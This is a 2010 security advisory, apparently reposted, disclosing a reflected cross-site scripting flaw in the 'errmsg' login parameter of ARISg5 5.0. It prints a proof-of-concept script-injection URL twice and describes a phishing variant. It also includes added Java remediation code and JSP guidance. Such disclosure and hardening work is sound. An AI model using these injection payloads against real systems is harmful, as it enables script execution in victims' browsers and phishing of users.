SECURITYVULNS:DOC:23308 (Mar 02, 2010)

ARISg5 (Version 5.0) Cross Site Scripting Vulnerability

vulners.com

=========================================
Yaniv Miron aka "Lament" Advisory Feb 24, 2010
ARISg5 (Version 5.0) Cross Site Scripting Vulnerability

==========================================================================================
Application name: ARISg5 (arisglobal)
Version: 5.0
Class: Input Validation Error
Type: Cross Site Scripting (XSS)
Remote: Yes
Credit: Yaniv Miron aka "Lament"
Exploit:

http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=Phishing Error Message<script>alert('Malicious XSS Code')</script>

Yaniv Miron aka "Lament".
[email protected]

=====================
I. BACKGROUND

ARISg™ - Adverse Drug Event Reporting
pharmacovigilance and safety
ARISg is the world's leading pharmacovigilance
and clinical safety system for good reason,
with more than 300 life-sciences companies
maintaining their critical safety data in ARISg worldwide.

http://www.arisglobal.com/products/arisg.php

=====================
II. DESCRIPTION

  1. A malicious attacker may inject scripts into the "errmsg" parameter of the
    ARISg5 (Version 5.0) application; the value is reflected into the login page
    without encoding.

  2. A malicious attacker may inject his own error message through the "errmsg"
    parameter and create a phishing attack using the ARISg5 (Version 5.0)
    application.

=====================
III. ANALYSIS

  1. Exploitation of this vulnerability results in the execution of arbitrary
    script code in the victim's browser via a malicious link.

  2. Exploitation of this vulnerability results in the creation of a phishing page
    using the original ARISg5 (Version 5.0) application error page.
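Both issues above come from the same root cause: the login page echoes a client-supplied "errmsg" string into its HTML. The following is an added example written for this page, not ARISg code (the advisory shows only the exploit URL, so the handler, the message keys and the markup are assumptions). It puts the vulnerable echo next to a hardened version that lets the client pick only a server-defined message key and still HTML-encodes the result, which removes both the script injection and the free-text phishing message.

```java
// Added example, not ARISg's code: rendering a login error message safely.
// The class name, message keys and markup are assumptions for illustration.
import java.util.LinkedHashMap;
import java.util.Map;

public final class LoginErrorMessage {

    // Server-defined messages, selected by a short key. The client can choose
    // among these but cannot supply its own text (defeats the phishing variant).
    private static final Map<String, String> MESSAGES = new LinkedHashMap<>();
    static {
        MESSAGES.put("badcred", "Invalid user name or password.");
        MESSAGES.put("locked",  "Your account is locked. Contact your administrator.");
        MESSAGES.put("expired", "Your session has expired. Please sign in again.");
    }
    private static final String DEFAULT_MESSAGE = "Login failed.";

    /** Minimal HTML entity encoding, safe for text nodes and quoted attributes. */
    static String htmlEscape(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Vulnerable pattern: the request parameter is echoed verbatim into the page. */
    static String renderUnsafe(String errmsg) {
        return "<div class=\"error\">" + errmsg + "</div>";
    }

    /** Hardened: resolve the key to a fixed message, then encode as defence in depth. */
    static String renderSafe(String errmsgKey) {
        String text = (errmsgKey != null) ? MESSAGES.get(errmsgKey) : null;
        if (text == null) {
            text = DEFAULT_MESSAGE; // unknown or tampered key: generic message, nothing echoed
        }
        return "<div class=\"error\">" + htmlEscape(text) + "</div>";
    }

    public static void main(String[] args) {
        // Constructed input mirroring the payload shape from the advisory.
        String payload = "Phishing Error Message<script>alert('Malicious XSS Code')</script>";
        System.out.println(renderUnsafe(payload)); // script element lands in the page
        System.out.println(renderSafe(payload));   // unknown key -> "Login failed."
        System.out.println(renderSafe("locked"));  // a legitimate key resolves normally
        System.out.println(htmlEscape(payload));   // what encoding alone would produce
    }
}
```

In a JSP page the same effect comes from never using `<%= request.getParameter("errmsg") %>` directly; print a server-side message through `<c:out value="${msg}"/>` (JSTL escapes XML by default) after mapping the key on the server as above. The encoding step is kept even with the allowlist so that a later change to the message table cannot reintroduce the injection.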

=====================
IV. EXPLOIT

http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=Phishing Error Message<script>alert('Malicious XSS Code')</script>

=====================
V. DISCLOSURE TIMELINE

Jan 2009 Vulnerability found
Jan 2009 Vendor Notification
Feb 2010 Vendor Notification (Before Disclosure)
Feb 2010 Public Disclosure

=====================
VI. CREDIT

Yaniv Miron aka "Lament".
[email protected]